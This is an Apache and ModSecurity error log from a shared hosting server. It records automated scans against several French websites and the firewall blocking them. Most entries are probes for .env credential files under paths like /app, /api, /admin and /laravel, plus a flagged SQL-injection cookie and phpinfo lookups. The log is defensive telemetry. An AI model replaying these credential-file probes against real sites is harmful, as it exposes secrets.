[Mon May 11 23:23:21.290438 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/hello.php
[Mon May 11 23:23:32.201305 2026] [security2:error] [pid 1590352:tid 1590406] [client 114.119.146.220:41673] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: ba5b45562a2d5de4f8203fdcd1914d32||1778536407||1778536047"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/booking-confirmation/booking-confirmed/"] [unique_id "agJI1K1q0G_aXAqWauQM1QAAAI4"], referer: https://rentparadise.fr/booking-confirmation/booking-confirmed
[Mon May 11 23:23:32.202496 2026] [security2:error] [pid 1590352:tid 1590406] [client 114.119.146.220:41673] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/booking-confirmation/booking-confirmed/"] [unique_id "agJI1K1q0G_aXAqWauQM1QAAAI4"], referer: https://rentparadise.fr/booking-confirmation/booking-confirmed
[Mon May 11 23:23:33.091432 2026] [security2:error] [pid 1590352:tid 1590406] [client 114.119.146.220:41673] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJI1K1q0G_aXAqWauQM1QAAAI4"], referer: https://rentparadise.fr/booking-confirmation/booking-confirmed
[Mon May 11 23:23:43.265716 2026] [security2:error] [pid 1606352:tid 1606437] [client 176.65.139.237:37364] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJI33o_DFxNSZVmaX3jmAAAANI"]
[Mon May 11 23:23:43.265953 2026] [security2:error] [pid 1606352:tid 1606437] [client 176.65.139.237:37364] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJI33o_DFxNSZVmaX3jmAAAANI"]
[Mon May 11 23:23:43.268999 2026] [core:error] [pid 1606352:tid 1606437] [client 176.65.139.237:37364] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:23:43.269181 2026] [security2:error] [pid 1606352:tid 1606437] [client 176.65.139.237:37364] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.rentparadise.fr"] [uri "/index.php"] [unique_id "agJI33o_DFxNSZVmaX3jmAAAANI"]
[Mon May 11 23:23:59.108428 2026] [security2:error] [pid 1601130:tid 1601167] [client 43.133.54.83:44278] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJI73EgAO_835W6c1mpLAAAAFE"]
[Mon May 11 23:24:14.064322 2026] [security2:error] [pid 1590352:tid 1590409] [client 43.156.47.42:47512] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/a-propos/"] [unique_id "agJI_q1q0G_aXAqWauQM6wAAAJE"]
[Mon May 11 23:24:17.371940 2026] [security2:error] [pid 1590352:tid 1590408] [client 43.163.206.70:33972] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "maelbailly.fr"] [uri "/"] [unique_id "agJJAa1q0G_aXAqWauQM7AAAAJA"]
[Mon May 11 23:24:24.576523 2026] [core:error] [pid 1606352:tid 1606442] [client 91.224.92.99:60339] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:24.576727 2026] [core:error] [pid 1606352:tid 1606442] [client 91.224.92.99:60339] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:24.776469 2026] [core:error] [pid 1588898:tid 1588900] [client 91.224.92.99:58365] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:24.776518 2026] [core:error] [pid 1588898:tid 1588900] [client 91.224.92.99:58365] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:24.951150 2026] [core:error] [pid 1630927:tid 1630951] [client 91.224.92.99:58320] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:24.951198 2026] [core:error] [pid 1630927:tid 1630951] [client 91.224.92.99:58320] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:25.140691 2026] [core:error] [pid 1590352:tid 1590414] [client 91.224.92.99:58995] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:25.140737 2026] [core:error] [pid 1590352:tid 1590414] [client 91.224.92.99:58995] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:25.179044 2026] [security2:error] [pid 1601130:tid 1601150] [client 43.163.206.70:58146] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agJJCXEgAO_835W6c1mpPwAAAEA"], referer: http://maelbailly.fr
[Mon May 11 23:24:25.322593 2026] [core:error] [pid 1605480:tid 1605531] [client 91.224.92.99:53060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:25.322642 2026] [core:error] [pid 1605480:tid 1605531] [client 91.224.92.99:53060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:25.481699 2026] [core:error] [pid 1606352:tid 1606437] [client 91.224.92.99:60450] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:25.481767 2026] [core:error] [pid 1606352:tid 1606437] [client 91.224.92.99:60450] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:25.976252 2026] [core:error] [pid 1588898:tid 1588903] [client 91.224.92.99:58250] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:25.976282 2026] [core:error] [pid 1588898:tid 1588903] [client 91.224.92.99:58250] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:26.194176 2026] [core:error] [pid 1601130:tid 1601158] [client 91.224.92.99:58514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:26.194240 2026] [core:error] [pid 1601130:tid 1601158] [client 91.224.92.99:58514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:26.355488 2026] [core:error] [pid 1630927:tid 1630950] [client 91.224.92.99:58597] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:26.355520 2026] [core:error] [pid 1630927:tid 1630950] [client 91.224.92.99:58597] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:26.872281 2026] [core:error] [pid 1605480:tid 1605530] [client 91.224.92.99:53073] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:26.872331 2026] [core:error] [pid 1605480:tid 1605530] [client 91.224.92.99:53073] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:27.348229 2026] [core:error] [pid 1630927:tid 1630939] [client 91.224.92.99:56946] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:27.348276 2026] [core:error] [pid 1630927:tid 1630939] [client 91.224.92.99:56946] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:24:40.312474 2026] [security2:error] [pid 1605480:tid 1605544] [client 176.65.139.232:38130] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "classist.fr"] [uri "/app/.env"] [unique_id "agJJGB2Cvzd_nyNfUm8SzQAAARY"]
[Mon May 11 23:24:40.313422 2026] [security2:error] [pid 1605480:tid 1605544] [client 176.65.139.232:38130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "classist.fr"] [uri "/app/.env"] [unique_id "agJJGB2Cvzd_nyNfUm8SzQAAARY"]
[Mon May 11 23:24:40.315550 2026] [security2:error] [pid 1605480:tid 1605544] [client 176.65.139.232:38130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "classist.fr"] [uri "/app/.env"] [unique_id "agJJGB2Cvzd_nyNfUm8SzQAAARY"]
[Mon May 11 23:24:57.675580 2026] [security2:error] [pid 1630927:tid 1630936] [client 213.209.159.175:42244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agJJKWiGYYhUwDaJINmgoAAAAUY"]
[Mon May 11 23:24:57.676486 2026] [security2:error] [pid 1630927:tid 1630936] [client 213.209.159.175:42244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agJJKWiGYYhUwDaJINmgoAAAAUY"]
[Mon May 11 23:24:57.708621 2026] [security2:error] [pid 1630927:tid 1630936] [client 213.209.159.175:42244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKWiGYYhUwDaJINmgoAAAAUY"]
[Mon May 11 23:24:57.747139 2026] [security2:error] [pid 1590352:tid 1590392] [client 213.209.159.175:42254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/.env"] [unique_id "agJJKa1q0G_aXAqWauQNGwAAAIA"]
[Mon May 11 23:24:57.747410 2026] [security2:error] [pid 1590352:tid 1590392] [client 213.209.159.175:42254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/.env"] [unique_id "agJJKa1q0G_aXAqWauQNGwAAAIA"]
[Mon May 11 23:24:57.753918 2026] [security2:error] [pid 1590352:tid 1590392] [client 213.209.159.175:42254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKa1q0G_aXAqWauQNGwAAAIA"]
[Mon May 11 23:24:57.797943 2026] [security2:error] [pid 1605480:tid 1605522] [client 213.209.159.175:42270] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/backend/.env"] [unique_id "agJJKR2Cvzd_nyNfUm8S9AAAAQA"]
[Mon May 11 23:24:57.798401 2026] [security2:error] [pid 1605480:tid 1605522] [client 213.209.159.175:42270] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/backend/.env"] [unique_id "agJJKR2Cvzd_nyNfUm8S9AAAAQA"]
[Mon May 11 23:24:57.801203 2026] [security2:error] [pid 1605480:tid 1605522] [client 213.209.159.175:42270] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKR2Cvzd_nyNfUm8S9AAAAQA"]
[Mon May 11 23:24:57.849804 2026] [:error] [pid 1606352:tid 1606427] [client 213.209.159.175:42274] File does not exist: /var/www/html/phpinfo.php
[Mon May 11 23:24:57.948481 2026] [security2:error] [pid 1601130:tid 1601173] [client 213.209.159.175:42282] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/admin/.env"] [unique_id "agJJKXEgAO_835W6c1mpdAAAAFc"]
[Mon May 11 23:24:57.948699 2026] [security2:error] [pid 1601130:tid 1601173] [client 213.209.159.175:42282] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/admin/.env"] [unique_id "agJJKXEgAO_835W6c1mpdAAAAFc"]
[Mon May 11 23:24:57.953453 2026] [security2:error] [pid 1601130:tid 1601173] [client 213.209.159.175:42282] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKXEgAO_835W6c1mpdAAAAFc"]
[Mon May 11 23:24:58.187007 2026] [security2:error] [pid 1601130:tid 1601173] [client 213.209.159.175:42282] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/laravel/.env"] [unique_id "agJJKnEgAO_835W6c1mpdgAAAFc"]
[Mon May 11 23:24:58.187238 2026] [security2:error] [pid 1601130:tid 1601173] [client 213.209.159.175:42282] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/laravel/.env"] [unique_id "agJJKnEgAO_835W6c1mpdgAAAFc"]
[Mon May 11 23:24:58.194563 2026] [security2:error] [pid 1601130:tid 1601173] [client 213.209.159.175:42282] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKnEgAO_835W6c1mpdgAAAFc"]
[Mon May 11 23:24:58.293043 2026] [security2:error] [pid 1606352:tid 1606430] [client 213.209.159.175:42298] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.example"] [unique_id "agJJKno_DFxNSZVmaX3kHQAAAMs"]
[Mon May 11 23:24:58.293682 2026] [security2:error] [pid 1606352:tid 1606430] [client 213.209.159.175:42298] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.example"] [unique_id "agJJKno_DFxNSZVmaX3kHQAAAMs"]
